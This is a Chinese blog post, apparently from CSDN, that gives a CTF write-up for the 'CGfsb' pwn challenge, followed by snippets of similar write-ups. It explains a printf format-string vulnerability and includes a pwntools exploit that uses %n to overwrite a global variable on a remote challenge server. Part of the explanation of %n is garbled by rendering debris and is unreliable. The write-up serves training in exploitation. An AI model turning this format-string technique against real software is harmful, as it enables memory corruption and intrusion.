cgfsb-格式化字符串

最新推荐文章于 2023-03-07 09:33:09 发布
最新推荐文章于 2023-03-07 09:33:09 发布
阅读量643 收藏
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/91345669
版权

cgfsb-格式化字符串漏洞

程序大致逻辑如下

 v8 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf = 0;
  v5 = 0;
  v6 = 0;
  memset(&s, 0, 0x64u);
  puts("please tell me your name:");
  read(0, &buf, 0xAu);
  puts("leave your message please:");
  fgets(&s, 0x64, stdin);
  printf("hello %s", &buf);
  puts("your message is:");
  printf(&s);                                   // 格式化字符串漏洞
  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}

要求变量pwnme的值为8 ,发现了格式化字符串漏洞printf(&s),由于没有设置第一个fromt参数,printf自动将我们输入的字符串当作fromt参数,我们可以利用参数%n,向pwnme处写入数据

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,如%100×10 n 表 示 将 0 x 64 写 入 偏 移 10 处 保 存 的 指 针 所 指 向 的 地 址 ( 4 字 节 ) , 而 n表示将0x64写入偏移10处保存的指针所指向的地址(4字节),而% n0x64104hn表示写入的地址空间为2字节,% h h n 表 示 写 入 的 地 址 空 间 为 1 字 节 , hhn表示写入的地址空间为1字节,% hhn1lln表示写入的地址空间为8字节,在32bit和64bit环境下一样。有时,直接写4字节会导致程序崩溃或等候时间过长,可以通过% h n 或 hn或% hnhhn来适时调整。

我们将pwnme的地址写在栈上,在printf上下断点,查看一下pwnme的偏移。

在这里插入图片描述

偏移为10,即可确定payload=p32(0x0804A068)+‘aaaa’+’%10$n’

最后exp如下

from pwn import *
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
context.log_level='debug'
p=remote('111.198.29.45','51433')
p.recvuntil(':\n')
p.sendline('111')
payload=p32(0x0804A068)+'aaaa'+'%10$n'
p.sendline(payload)
p.recvuntil(':\n')
print p.recv()
sleep(2)

参考文章如下

https://www.anquanke.com/post/id/85785

playmak3r
关注
专栏目录
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1770
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
CGfsb(xctf)
weixin_43868725的博客
05-06 678
0x0 程序保护和流程 保护: 流程: main() 可以明显的发现存在一个格式化字符串漏洞,然后当pwnme这个变量等于8时调用’cat flag’这个命令。又因为程序没有开启pie并且pwnme是全局变量,所以可以通过格式化字符串漏洞将pwnme这个变量改为8从而得到flag。 0x1 利用过程 首先先确定偏移量 可以发现偏移量是10,然后查看pwnme变量的地址 将pwnme的值改为...
攻防世界 CGfsb
10-03 605
1.题目 2.IDA分析 3.流程分析 流程很简单, 输入名字和信息,然后打印刚刚输入的信息出来,如果未初始化的pwnme的值为8,则成功cat flag。这里printf直接把&s打印出来,明显存在格式化字符串漏洞。 解释一下格式化字符串,一般printf的参数是:格式化字符串 + 参数1 + 参数2 ...。如果后面的参数数量对应不上格式化字符串中需要的参数,会自动从栈顶获取对应的参数。如下图: 输入“AAAAAAA%x-%x-%x-%x-%x-%x-%x-%x-%x-%.
攻防世界 CGfsb-格式化字符串漏洞
Casuall的博客
05-21 715
引用维基百科https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro/ 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程...
[攻防世界]CGfsb
逆向萌新的博客
06-20 223
[攻防世界]CGfsb详解
[攻防世界 pwn]——CGfsb
Y_peak的博客
02-18 184
[攻防世界 pwn]——CGfsb 题目地址: https://adworld.xctf.org.cn/ 题目: 这是一道简单的格式化字符串问题, 详情请参考点点我呀,参考就是我 在pwndbg中调试, 偏移为 0xa = 10 exploit from pwn import * #p = process("./e41a0f684d0e497f87bb309f91737e4d") p = remote("111.200.241.244",57659) #gdb.attach(p, "b *0x0
攻防世界-CGfsb
qq_45771413的博客
04-23 430
知识点 格式化字符串漏洞(printf) 检查保护 PIE没有保护,全局变量地址固定 IDA 逻辑很简单,输入name,输入message,然后当pwnme等于8时,自动执行cat flag操作。但是pwnme没有被赋值,也没有可操作的地方,需要把它改成8。 但是找了一圈没发现有栈溢出的地方,看wp发现是格式化字符串漏洞,只能嗯学(栈溢出还没整熟悉〒▽〒)。 格式化字符串知识点 格式化字符串(摘自CTF-WIKI) 格式化字符串函数是根据格式化字符串函数来进行解析的。那么相应的要被解析的参数的个数也自然
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1589
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
pwn 格式化字符串漏洞
清霂的博客
03-10 515
7.cgpwn2 file checksec ida32
格式化字符串漏洞入门简述(含例子:攻防世界pwn新手题GCfsb)
ins_Digger的博客
10-30 1062
##本文参考的文章有如下的博客(实在太菜,所以花了好长时间去练习,找题,看博客才稍微有一点点明白,其实还是不是特别明白) https://www.freebuf.com/column/207425.html 《黑客攻防技术宝典:系统篇》第四章 格式化字符串漏洞的简单概述 学过 c 语言应该就会知道printf()函数的使用方法,如下图: int main(){ char str[100]; s...
攻防世界-CGfsb详细知识点及解答
最新发布
m0_74047686的博客
03-07 714
做这道题的时候,对于格式化字符串的知识要有一定了解,不然的话,就要像我一样,忙来忙去,很麻烦的如何利用格式化字符串呢?我做了一些知识总结。格式化字符串攻击(Format String Vulnerabilities,简称FSV)是指攻击者通过构造恶意格式化字符串控制符,在程序中读写不该被访问的内存区域、获取敏感信息等操作。攻击者通常利用以下方式来实施格式化字符串攻击:(1)打印栈上的数据。
攻防世界pwn——CGfsb
qq_62076255的博客
09-08 274
攻防世界pwn——CGfsb
攻防世界 Pwn CGfsb
MrTreebook的博客
11-28 193
攻防世界pwn CGfsb1.先看保护机制2.看一下源代码有什么漏洞3.看一下格式化字符串溢出长度4.看一下pwnme的地址5.exp 1.先看保护机制 2.看一下源代码有什么漏洞 这里很明显是格式化字符串 看到这里发现程序需要pwnme==8才可以拿到flag 3.看一下格式化字符串溢出长度 输入数据后gdb调试数一下 offset=10 4.看一下pwnme的地址 那思路就是利用格式化字符串的%n写个8到pwnme中就好了 5.exp from pwn import * #a=process(
攻防世界 新手区CGfsb
qq_25044201的博客
12-27 135
老办法看一下开启了哪些保护 然后放在ida静态分析一下 大体意思是全局变量pwnme=8时会获得flag 但是pwnme这个变量我们无法控制,怎么办呢? 其中有个关键的 这里如果我们输入%x 它会输出什么? 我输入了aaaa 以及12个%x linux系统会按栈的顺序一一输出内容 而aaaa 泄露在第11个参数 所以我们先泄露这个pwnme全局变量的位置 然后通过%$n修改这地址的值 所以完成 ...
【ADworld】Pwn--CGfsb
VZZmieshenquan的博客
02-15 1111
Description: 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 Solution: 先checksec再file运行一下 Flag:
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3384
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界PWN-CGfsb
Deeeelete的博客
11-12 406
题目:CGfsb 先下载附件 先确保本地的python有pwntools模块(pip install pwntools),模块安装后会有一个checksec命令,可以用该命令查看文件的基本信息 1.扔文件进kali,使用checksec 命令查看其具体内容 几个重要参数: Arch 程序架构信息,判断是64位还是32位,exp编写的时候是p64还是p32 RELRO Relocation Read-Onl(RELRO)此项技术主要针对GOT改写的攻击方式,它分成两种,Partial RELRO
【攻防世界pwn-CGfsb
a_silly_coder的博客
05-18 308
首先检查文件保护 将文件拖入32位ida 阅读代码后,发现这是一个简单的格式化字符串漏洞,通过修改pwnme的数值为8,直接执行cat flag。pwnme在0x0804A068的位置。 随后用gdb确认偏移,有两种方法,一种是直接数栈上的位置,另一种是输入AAAA.%x.%x.%x查看。我采用第一种。 栈上是第11个位置,但是由于第一个位置参数是格式化字符串,所以输入的AAAA其实是格式化字符串的第10个参数。 开始编写攻击脚本。 from pwn import ...
Python f-string格式化字符串详解
"本文主要介绍了Python的f-string格式化字符串技术,并结合听语音的场景进行了讲解,涵盖了f-string的基本用法、转换字段的规则、以及各种格式限定的细节。" 在Python编程中,f-string是一种方便且高效的方式来格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值